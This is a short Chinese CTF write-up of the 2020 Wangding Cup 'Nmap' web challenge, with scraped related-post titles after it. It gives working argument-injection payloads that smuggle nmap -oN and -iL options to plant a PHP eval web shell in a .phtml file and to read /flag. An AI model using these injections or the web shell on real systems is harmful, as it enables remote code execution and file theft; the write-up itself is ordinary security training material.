NO.2-24 [网鼎杯 2020 朱雀组]Nmap
站老是崩,有点难受。
过程
1.题目非常熟悉,以前在buu写过。主要考察nmap的一些用法。
2.
选项 解释
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 补充保存文件
选项-oG
将结果Grep保存。
nmap -F -oG test.txt 192.168.23.1
选项-oA
该选项可将扫描结果以标准格式、XML格式和Grep格式一次性保存,分别放在.nmap,.xml和.gnmap文件中。
3.尝试对扫描结果进行指定文件保存,
输入-oN aa.txt,然后访问/aa.txt
出现:# Nmap 6.47 scan initiated Mon May 18 15:58:14 2020 as: nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/05cc1 -oN aa.txt \
4.于是猜测是否可以写一个木马文件上去,测试发现过滤了php字符串
可以上传<?=eval(\$_POST[a]);?> 文件名为phtml
payload:' -oN b.phtml <?=eval(\$_POST[a]);?>'
访问b.phtml
5.当然还有更简单的写法。
127.0.0.1' -iL /flag -oN vege.txt '
然后直接访问即可。
NO.2-24 [网鼎杯 2020 朱雀组]Nmap相关推荐
- [网鼎杯 2020 朱雀组]Nmap
- nmap -oG -iL 写入文件和读取文件之[网鼎杯 2020 朱雀组]Nmap
知识点: 利用-oG,可以将命令和结果写进文件. 利用-iL 和-oN.其中-iL是从inputfilename文件中读取扫描的目标.在这个文件中要有一个主机或者网络的列表,由空格键.制表键或者回车键 ...
- [网鼎杯 2020 朱雀组]phpweb
目录 解题过程: 找payload: 1. 对in_array()函数进行绕过 2. php反序列化 参考文章: 考点:关于call_user_func()函数的用法,php反序列化(本题不用也能做) ...
- [网鼎杯 2020 朱雀组]phpweb-反弹shell
[网鼎杯 2020 朱雀组]phpweb 通过反弹shell获取flag 打开链接,显示一个不断刷新的页面,通过burp抓包查看 通过对页面源代码的分析,发现在本页面中,通过post传入index.p ...
- [网鼎杯 2020 朱雀组]Think Java
[网鼎杯 2020 朱雀组]Think Java 文章目录 [网鼎杯 2020 朱雀组]Think Java 获取源文件 Swagger JDBC sql注入 关于#的使用 查看数据库名字 获取表名 ...
- 【网鼎杯 2020 朱雀组】Think Java
[网鼎杯 2020 朱雀组]Think Java 首先下载题目附件,是一些.class文件,反编译查看. 注意到引入的其中一个包: import io.swagger.annotations.ApiO ...
- [网鼎杯 2020 朱雀组]之phpweb两种不同的解题方式
目录 方法一: 方法二: 知识点: 1)黑名单取巧绕过 2)PHP的file_get_contents函数使用 3)PHP序列化与反序列化构造 访问靶机,观察页面,开始时首先加载了一张图片,随后刷新回 ...
- [网鼎杯 2020 朱雀组]phpweb 待续
抓包看参数 联想到函数 读index.php代码 func=file_get_contents&p=index.php <?php $disable_fun = array ...
- [网鼎杯 2020 青龙组]jocker
[网鼎杯 2020 青龙组]jocker SMC(self-Modifying Code): 自修改代码,程序在执行某段代码的过程中会对程序的代码进行修改,只有在修改后的代码才是可汇编,可执行的.在程 ...
最新文章
- 查询数据库中的表结构信息
- MyBatis增删改示例——MyBatis学习笔记之二
- 测试女生周期的软件名字,什么软件可以提醒生理期?适合女生可用的便签软件...
- 安装Hadoop及Spark(Ubuntu 16.04)
- 美国警察开特斯拉追疑犯,时速飙到193公里,然后发现没电了...
- vf求计算机系统当前日期的年份数,计算机二级VF常用函数列表
- javascript Array类型 方法大全
- Android studio无法创建类和接口问题解决办法。提示 Unable to parse template Class
- 封装数据库增删该通用方法
- iic调试软件上时钟芯片测试,时钟芯片的测试方法和系统 Clock chip testing methods and systems...
- MATLAB初学者视频教程
- 前端之路:一款轻量的tooltip插件tippy.js
- 关于技术人员的非技术能力
- Android实现横幅通知
- 计算机软件知识产权的范围,知识产权包括的范围是什么
- 软件工程 软件质量模型(ISO/IEC 9126)
- C++ OpenCV(四):绘制几何图形
- Python判断指定日期是不是法定节假日
- UML--核心元素之参与者Actor
- 解决Whitelabel Error Page最简单的方式
热门文章
- 软件项目管理实验一附加
- 洛谷刷题C语言:Bold、饱食、公平の意、DOM、
- bach cello
- Leetcode 初级算法 - 数学
- Linux hook系统调用open/read/write
- 闪兼云带你游历互联网网赚的不同时代
- API 网关 (API Gataway)
- 安卓桌面壁纸_效仿安卓?iOS14或将支持“快应用” 功能 可玩性更强了
- 致敬最美逆行者网页设计作品 大学生抗疫感动专题网页设计作业模板 疫情感动人物静态HTML网页模板下载
- 金蝶k3显示加层服务器失败,金蝶k3提示:连接中间加密服务失败,请确认中间层加密服务已启动...